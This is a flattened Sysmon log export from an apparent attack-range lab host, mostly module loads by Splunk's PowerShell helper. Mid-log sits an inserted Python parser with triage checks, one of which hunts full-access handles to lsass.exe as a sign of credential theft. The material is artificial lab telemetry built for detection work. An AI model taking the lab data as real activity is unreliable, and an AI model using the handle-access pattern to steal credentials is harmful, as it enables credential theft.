CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 
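Added example, not part of this export and not Sysmon, Splunk or attack_range code: a Python parser for the flattened record format above, in which each Sysmon event's fields are run together in schema order with no delimiters. It splits records on the header prefix, decodes the run-together EventID/Version/Level/Task/Opcode digits (the decoding assumes what this export shows throughout: Level 4, Task equal to EventID, Opcode 0, RuleName '-'), pulls out the hashes and the fields whose boundaries are unambiguous, and runs three checks a triage analyst would want over this data: FileDelete (event 23) records whose Archived field reads 'false - insufficient disk space', meaning Sysmon could not keep a copy of the deleted file; ImageLoad (event 7) modules not signed by Microsoft; and ProcessAccess (event 10) handles opened with PROCESS_ALL_ACCESS (0x1fffff) on a chosen target image. The three sample records are copied verbatim from the export; every function and regex name is mine, and lsass.exe as a hunt target is an assumption, not something on this page.

```python
"""Parse the flattened Sysmon export on this page and run three triage checks.
Hypothetical helper written for this page, not Sysmon, Splunk or attack_range
code. Each record is one event's fields concatenated in schema order with no
delimiters, so only fields with unambiguous boundaries are recovered; the
SourceProcessId+SourceThreadId digit run of event 10 is left combined."""
import re

# Sample input: three records (events 23, 7, 10) copied verbatim from the
# export above, joined with the single space the export puts between records.
SAMPLE_RECORDS = [
    r"23542300x800000000000000098719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:48.859{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEM"
    r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational"
    r"MD5=F3EB755BAFF1CAC8AAF894D3F0DC9F78,SHA256=E0B1F8405A7B13332D9779D809EE18DD0F5B5632C7D29D926ED94A4BE69E86F9,IMPHASH=00000000000000000000000000000000"
    r"falsefalse - insufficient disk space",
    r"734700x800000000000000098794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696"
    r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll"
    r"1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dll"
    r"MD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFE"
    r"trueSplunk, Inc.Valid",
    r"10341000x800000000000000098774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-A252-6294-0500-000000005502}416532"
    r"C:\Windows\system32\csrss.exe{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffff"
    r"C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f",
]
SAMPLE_BLOB = " ".join(SAMPLE_RECORDS)

PATH = r"[A-Za-z]:\\.+?"  # a Windows path, shortest match
# EventID/Version/Level/Task/Opcode run together, then Keywords, EventRecordID, Channel.
RECORD_START = re.compile(r"(?P<hdr>\d+)0x8000000000000000(?P<record_id>\d+)Microsoft-Windows-Sysmon/Operational")
# Computer, RuleName ('-' throughout this export), UtcTime, first GUID, remainder.
HEADER_TAIL = re.compile(r"(?P<computer>.+?)-(?P<utc>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\{(?P<guid>[0-9A-F-]{36})\}(?P<body>.*)$")
HASHES = re.compile(r"MD5=([0-9A-F]{32}),SHA256=([0-9A-F]{64}),IMPHASH=([0-9A-F]{32})")
# Event 7: ProcessId, Image, ImageLoaded ... Hashes, Signed, Signature, SignatureStatus.
IMAGE_LOAD = re.compile(r"^(?P<pid>\d+)(?P<image>" + PATH + r"\.exe)(?P<loaded>" + PATH + r"\.(?:dll|exe|sys|drv|ocx|cpl))", re.I)
SIG_TAIL = re.compile(r"^(?P<signed>true|false)(?P<signature>.*?)(?P<status>Valid|Unavailable|Invalid)$")
# Event 23: ProcessId, User, Image, TargetFilename, Hashes, IsExecutable, Archived.
FILE_DELETE = re.compile(r"^(?P<pid>\d+)(?P<user>.+?)(?P<image>" + PATH + r"\.exe)(?P<target>" + PATH + r")MD5=")
# Event 10: GrantedAccess is lowercase hex; the CallTrace that follows always opens with a 'C:\' frame, which delimits the mask.
PROCESS_ACCESS = re.compile(r"^(?P<src_ids>\d+)(?P<src_image>" + PATH + r"\.exe)\{(?P<tgt_guid>[0-9A-F-]{36})\}(?P<tgt_pid>\d+)"
                            r"(?P<tgt_image>" + PATH + r"\.exe)(?P<access>0x[0-9a-f]+?)(?=[Cc]:\\)(?P<trace>.*)$")

def split_records(blob):
    """One string per Sysmon event from the run-together export."""
    starts = [m.start() for m in RECORD_START.finditer(blob)]
    return [blob[a:b].strip() for a, b in zip(starts, starts[1:] + [len(blob)])]

def decode_header(digits):
    """(EventID, Version) from the prefix. Sysmon emits Level 4, Task == EventID
    and Opcode 0, so the prefix reads EventID + Version + '4' + EventID + '0'."""
    for n in (1, 2):
        eid, rest = digits[:n], digits[n:]
        if len(rest) == n + 3 and rest[1] == "4" and rest[2:-1] == eid and rest[-1] == "0":
            return int(eid), int(rest[0])
    raise ValueError("unrecognised header prefix " + digits)

def parse_record(rec):
    """Dict of the unambiguously recoverable fields of one record."""
    head = RECORD_START.match(rec)
    tail = HEADER_TAIL.match(rec, head.end())
    event_id, version = decode_header(head["hdr"])
    out = {"event_id": event_id, "version": version, "record_id": int(head["record_id"]),
           "computer": tail["computer"], "utc_time": tail["utc"], "process_guid": tail["guid"]}
    body, after = tail["body"], ""
    if hashes := HASHES.search(body):
        out["md5"], out["sha256"], out["imphash"] = hashes.groups()
        after = body[hashes.end():]
    if event_id == 7 and (m := IMAGE_LOAD.match(body)) and (sig := SIG_TAIL.match(after)):
        out.update(pid=int(m["pid"]), image=m["image"], image_loaded=m["loaded"], signed=sig["signed"] == "true",
                   signature=sig["signature"], signature_status=sig["status"])
    elif event_id == 23 and (m := FILE_DELETE.match(body)) and (flags := re.match(r"(true|false)(.*)$", after)):
        # Archived is 'true' on success; on failure Sysmon appends the reason.
        out.update(pid=int(m["pid"]), user=m["user"], image=m["image"], target=m["target"],
                   is_executable=flags[1] == "true", archived=flags[2])
    elif event_id == 10 and (m := PROCESS_ACCESS.match(body)):
        out.update(source_ids=m["src_ids"], source_image=m["src_image"], target_pid=int(m["tgt_pid"]),
                   target_image=m["tgt_image"], granted_access=m["access"], call_trace=m["trace"].split("|"))
    return out

def archive_failures(records):
    """Event 23 records whose Archived field is not plain 'true': the deleted
    file was not preserved in the Sysmon archive, so that evidence is gone."""
    return [(r["record_id"], r["archived"]) for r in records if r["event_id"] == 23 and "archived" in r and r["archived"] != "true"]

def non_microsoft_loads(records):
    """Event 7 modules whose signer is not Microsoft: basename, signer, SHA-256 for pivoting."""
    return [(r["record_id"], r["image_loaded"].rsplit("\\", 1)[-1], r["signature"], r["sha256"])
            for r in records if r["event_id"] == 7 and "signature" in r and not r["signature"].startswith("Microsoft")]

def full_access_handles(records, target_basename):
    """Event 10 handles opened with PROCESS_ALL_ACCESS (0x1fffff) on a target image.
    Pointing this at lsass.exe is the usual hunt; that target is an assumption, not on this page."""
    want = "\\" + target_basename.lower()
    return [(r["record_id"], r["source_image"].rsplit("\\", 1)[-1]) for r in records
            if r["event_id"] == 10 and r.get("granted_access") == "0x1fffff" and r["target_image"].lower().endswith(want)]

if __name__ == "__main__":
    parsed = [parse_record(r) for r in split_records(SAMPLE_BLOB)]
    print(archive_failures(parsed), non_microsoft_loads(parsed), full_access_handles(parsed, "splunk-powershell.exe"))
```

On this export the 0x1fffff hits are csrss.exe and the parent splunkd.exe opening handles to freshly created Splunk child processes, which is ordinary process-creation activity; the check only earns its keep when pointed at a sensitive target, and because the SourceProcessId/SourceThreadId digit run cannot be split in this format, pivot on the source GUID rather than the PID. The archive failures are a telemetry-health finding rather than an attack indicator: the deleted files are the forwarder's own checkpoint and spool files, and the reason Sysmon gives is insufficient disk space, so FileDelete evidence from this host is incomplete until that is fixed.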
734700x800000000000000098801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program 
Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft 
Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.702{326FD73D-C0B5-6294-330B-000000005502}5696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x800000000000000098778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:03:50.327{326FD73D-A441-6294-EB00-000000005502}4800440C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000098830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.312{326FD73D-A441-6294-EB00-000000005502}4800ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000098829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.312{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:03:50.312{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.312{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.312{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000098825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 